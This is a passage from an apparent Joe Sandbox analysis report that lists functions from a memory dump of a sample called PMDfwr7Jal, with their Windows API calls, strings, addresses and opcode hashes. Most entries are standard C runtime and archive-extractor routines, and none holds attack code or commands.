Part of subcall function 007384DE: GetLastError.KERNEL32(?,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?,?), ref: 00738506

_free.LIBCMT ref: 0073C00E
_free.LIBCMT ref: 0073C019
_free.LIBCMT ref: 0073C06D
_free.LIBCMT ref: 0073C078
_free.LIBCMT ref: 0073C083
_free.LIBCMT ref: 0073C08E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: c29a1c4cbc43c22ce2b01e8dfd5ab52e6ee0cc40149579ac36ad4aed431f482f
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: CF110D72540B49FAEA60BBB0CC0BFCBB79D6F04740F409855B29966853DB79F9088A91

Uniqueness

Uniqueness Score: -1.00%

Function 007320CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007320C1,0072FB12), ref: 007320D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007320E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007320FF
SetLastError.KERNEL32(00000000,?,007320C1,0072FB12), ref: 00732151

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 077bf81916fe6c6e9a32a670e0cf7b0cba4ec558258623dbd8d9b5a041c2d43f
Instruction ID: 125ae12f441410d3b17d113edb7bb41b9c7295b8ad4ba95d6f8609a6c652bbdf
Opcode Fuzzy Hash: 077bf81916fe6c6e9a32a670e0cf7b0cba4ec558258623dbd8d9b5a041c2d43f
Instruction Fuzzy Hash: 6E014C3610A325EEB7642BB47C8951A2B54FB12731F31872BF310580F3EF1D4C025159

Uniqueness

Uniqueness Score: -1.00%

Function 00739029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0073895F,007385FB,?,00738FD3,00000001,00000364,?,00733713,00000050,?,00750EE8,00000200), ref: 0073902E
_free.LIBCMT ref: 00739063
_free.LIBCMT ref: 0073908A
SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 00739097
SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 007390A0

Strings

Xt, xrefs: 0073907E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLast$_free
String ID: Xt
API String ID: 3170660625-2287795844
Opcode ID: 544add293ba925f800bfcecbd684ff8581254a13a449976b04374724ecfd0983
Instruction ID: 23c4bd051216e31b2d3cf82cc210a6426681dc6d591134c2d39dd620d4482acd
Opcode Fuzzy Hash: 544add293ba925f800bfcecbd684ff8581254a13a449976b04374724ecfd0983
Instruction Fuzzy Hash: D9012D76605702EBF73627346C8A92B252EEBC2371F314115F60992163DFBCCC014165

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

KERNEL32.DLL, xrefs: 0072DCB4
ReleaseSRWLockExclusive, xrefs: 0072DCD9
AcquireSRWLockExclusive, xrefs: 0072DCC9

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: e67d3661d66bf371386531beafed3fe151acf51f7d81fdaf7ba2a4efc64ae3a6
Instruction ID: 08530124104c97e173681ae3b502f8b4a5a005ae66b3bd64917ffe63262fd4c6
Opcode Fuzzy Hash: e67d3661d66bf371386531beafed3fe151acf51f7d81fdaf7ba2a4efc64ae3a6
Instruction Fuzzy Hash: D901FF75741A329F4F315EB87C812E62398EA42353320A63BE546E7200EBADCCC5D6F4

Uniqueness

Uniqueness Score: -1.00%

Function 00738060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0073807E

Part of subcall function 007384DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?), ref: 007384F4
Part of subcall function 007384DE: GetLastError.KERNEL32(?,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?,?), ref: 00738506

_free.LIBCMT ref: 00738090
_free.LIBCMT ref: 007380A3
_free.LIBCMT ref: 007380B4
_free.LIBCMT ref: 007380C5

Strings

t, xrefs: 00738074

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: t
API String ID: 776569668-1107187082
Opcode ID: b655cccdc4a879c472213e9a88651682eb7f794bd390890a31a278224e2bdf9f
Instruction ID: a535ab658a334688c0dafe695a7d8552e58200d91742cafaa2234ee1d32ce1fd
Opcode Fuzzy Hash: b655cccdc4a879c472213e9a88651682eb7f794bd390890a31a278224e2bdf9f
Instruction Fuzzy Hash: 94F067B9901360CB9B816F19BC064053A60F704760748C21AF008D6E33CF3D08A58FCA

Uniqueness

Uniqueness Score: -1.00%

Function 00720CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00720D0D

Part of subcall function 0071ACF5: GetVersionExW.KERNEL32(?), ref: 0071AD1A

LocalFileTimeToFileTime.KERNEL32(?,00720CB8), ref: 00720D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 00720D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00720D56
SystemTimeToFileTime.KERNEL32(?,00720CB8), ref: 00720D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 00720D72

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: a580dc64255bcdf37cf7d090ceb0e6be2579b23c4eca1789271e7fe48a0a5c93
Instruction ID: ebbe4c95842a798335a9e77933ae5df4cb47f2dfa28433acd0a26cf3782cb39a
Opcode Fuzzy Hash: a580dc64255bcdf37cf7d090ceb0e6be2579b23c4eca1789271e7fe48a0a5c93
Instruction Fuzzy Hash: 1331077A90020AEBCB00DFE4D8859EFBBBCFF58300B04451AE955E3211E734AA45CB68

Uniqueness

Uniqueness Score: -1.00%

Function 007291B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 007291D4
_memcmp.LIBVCRUNTIME ref: 007291EB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: fed7fada33b2e636125565961bc07a8ce38e8126991366cbcef9cae3d37326e4
Instruction ID: cbd6eb0d6e8b5b5451d71e83295166441a8391140964b60bcf0d7228e7321135
Opcode Fuzzy Hash: fed7fada33b2e636125565961bc07a8ce38e8126991366cbcef9cae3d37326e4
Instruction Fuzzy Hash: D82181B160022EFBD7059E14EC81E6B77EDBB50788F188238FD099B216E378ED458691

Uniqueness

Uniqueness Score: -1.00%

Function 0072D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 0072D2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0072D30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0072D31D
TranslateMessage.USER32(?), ref: 0072D327
DispatchMessageW.USER32(?), ref: 0072D331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 0072D33C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 5818ab8e12dd0574efe2d142adbf86cc3a03ad66d5cfbf933acccc90fd6553b4
Instruction ID: fae23c792d0ee273bc06dd055878443bc641e99368a9ecc2f305e972ab241030
Opcode Fuzzy Hash: 5818ab8e12dd0574efe2d142adbf86cc3a03ad66d5cfbf933acccc90fd6553b4
Instruction Fuzzy Hash: D2F01D71A0112DABCB209BA1EC4DEDBBF7DEF52391F008112B51AD2011D6388542C6F5

Uniqueness

Uniqueness Score: -1.00%

Function 0072C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0072C435

Part of subcall function 007217AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0071BB05,00000000,.exe,?,?,00000800,?,?,007285DF,?), ref: 007217C2

Strings

MAX, xrefs: 0072C487
MIN, xrefs: 0072C4A3
HIDE, xrefs: 0072C474
<, xrefs: 0072C41E

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 19b02a19f9204612d5ba13e6843d4e0a5c915395a0843b0337390a2b04036521
Instruction ID: f847206370d34d888f4173432017193e55b8a12818701e9f4bbccd4b350413ac
Opcode Fuzzy Hash: 19b02a19f9204612d5ba13e6843d4e0a5c915395a0843b0337390a2b04036521
Instruction Fuzzy Hash: F731B472D0066DAADF22DA54EC45EEF77BCEB64340F004066FA05D2051EBB88FC4CA60

Uniqueness

Uniqueness Score: -1.00%

Function 0072A990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

EndDialog.USER32(?,00000001), ref: 0072A9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0072A9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0072AA24

Strings

xjv, xrefs: 0072AA02
GETPASSWORD1, xrefs: 0072A9A9

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xjv
API String ID: 445417207-3764258211
Opcode ID: 523469da9f9b1a12f435e37b8c52b6832a99f8c7066309df91209a7ea340f7f0
Instruction ID: 605a7b4a160d2419b7eec3c06bd7bf10d0d01cb18e5052b133c72756088cea67
Opcode Fuzzy Hash: 523469da9f9b1a12f435e37b8c52b6832a99f8c7066309df91209a7ea340f7f0
Instruction Fuzzy Hash: F6110C32940128B7DB219E65AD09FF7777CEF49700F004011FA45B2091D26D99D5D672

Uniqueness

Uniqueness Score: -1.00%

Function 0072ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0072ADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 0072AE22
DeleteObject.GDI32(00000000), ref: 0072AE54
DeleteObject.GDI32(00000000), ref: 0072AE77

Part of subcall function 00729E1C: FindResourceW.KERNEL32(0072AE4D,PNG,?,?,?,0072AE4D,00000066), ref: 00729E2E
Part of subcall function 00729E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0072AE4D,00000066), ref: 00729E46
Part of subcall function 00729E1C: LoadResource.KERNEL32(00000000,?,?,?,0072AE4D,00000066), ref: 00729E59
Part of subcall function 00729E1C: LockResource.KERNEL32(00000000,?,?,?,0072AE4D,00000066), ref: 00729E64

Strings

], xrefs: 0072AE2A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: c21c9a8b46352d5415db50913dd0c937c4e119f13616fb068069a3ac0044e76b
Instruction ID: 5a99939b55e5da3ba2e53151b58ad79dc3d922a76958ed5da611bc553b8de430
Opcode Fuzzy Hash: c21c9a8b46352d5415db50913dd0c937c4e119f13616fb068069a3ac0044e76b
Instruction Fuzzy Hash: 76012632940235F7C7106764BC0AA7F7B79AF81B42F0D0014FE14A7292DB3D8C1696B1

Uniqueness

Uniqueness Score: -1.00%

Function 0072CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

EndDialog.USER32(?,00000001), ref: 0072CCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0072CCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0072CD05
SetDlgItemTextW.USER32(?,00000068), ref: 0072CD14

Strings

RENAMEDLG, xrefs: 0072CCA8

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 99b95e0a61d304995bc420d1ceba0aa65508d577fe6a6c5d5a78a8fe8d5392f5
Instruction ID: eef6e984970403b2adf24068592d4f5d7a633fabcd610947de0c203153e81329
Opcode Fuzzy Hash: 99b95e0a61d304995bc420d1ceba0aa65508d577fe6a6c5d5a78a8fe8d5392f5
Instruction Fuzzy Hash: 6701D8323C43247BD6124F68AD09F5F7B5CEB6A742F108411F34AA60E1C7AD5945C779

Uniqueness

Uniqueness Score: -1.00%

Function 00732503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0073251A

Part of subcall function 00732B52: ___AdjustPointer.LIBCMT ref: 00732B9C

_UnwindNestedFrames.LIBCMT ref: 00732531
___FrameUnwindToState.LIBVCRUNTIME ref: 00732543
CallCatchBlock.LIBVCRUNTIME ref: 00732567

Strings

/)s, xrefs: 00732526, 00732517

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /)s
API String ID: 2633735394-1092249506
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: bf29ed0840800374e3a45cfa476c62c0941d1b5f2c27fd46206c41f82a507406
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: C9012932000108FBDF129F65DC05EDA3BBAEF58710F158064FD1866122D33AE972EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007375C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00737573,00000000,?,00737513,00000000,0074BAD8,0000000C,0073766A,00000000,00000002), ref: 007375E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007375F5
FreeLibrary.KERNEL32(00000000,?,?,?,00737573,00000000,?,00737513,00000000,0074BAD8,0000000C,0073766A,00000000,00000002), ref: 00737618

Strings

mscoree.dll, xrefs: 007375DB
CorExitProcess, xrefs: 007375ED

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 94787a36ba9711370415fb5fe1ff46940f7e29cc037921f22232f41fa27707a7
Instruction ID: 89edf4e38257e3bc41b1b2f860d69998c9b9741afd1d0fb0c900e592113f2a33
Opcode Fuzzy Hash: 94787a36ba9711370415fb5fe1ff46940f7e29cc037921f22232f41fa27707a7
Instruction Fuzzy Hash: 5AF0FC7460851CFBDB159F94DC09B9DBFB9EF04711F004159F809A2161DF388E44CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0071EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00720085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007200A0
Part of subcall function 00720085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0071EB86,Crypt32.dll,00000000,0071EC0A,?,?,0071EBEC,?,?,?), ref: 007200C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0071EB92
GetProcAddress.KERNEL32(007581C0,CryptUnprotectMemory), ref: 0071EBA2

Strings

CryptUnprotectMemory, xrefs: 0071EB98
CryptProtectMemory, xrefs: 0071EB8C
Crypt32.dll, xrefs: 0071EB7C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 54d94f7ea000801e35408662a89b3391431d6eeed010b0ab2d4bf3cdd409521a
Instruction ID: bdda81ea8d36344a18f69e88494dca51f405b589d8551a255918d06523c560f9
Opcode Fuzzy Hash: 54d94f7ea000801e35408662a89b3391431d6eeed010b0ab2d4bf3cdd409521a
Instruction Fuzzy Hash: 73E04FB44047519EDB319F389808B46BAE5AF15B04F00C81EE4DAD3290D7BCE5848B60

Uniqueness

Uniqueness Score: -1.00%

Function 00737DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00737E4B
_free.LIBCMT ref: 00737E6B

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
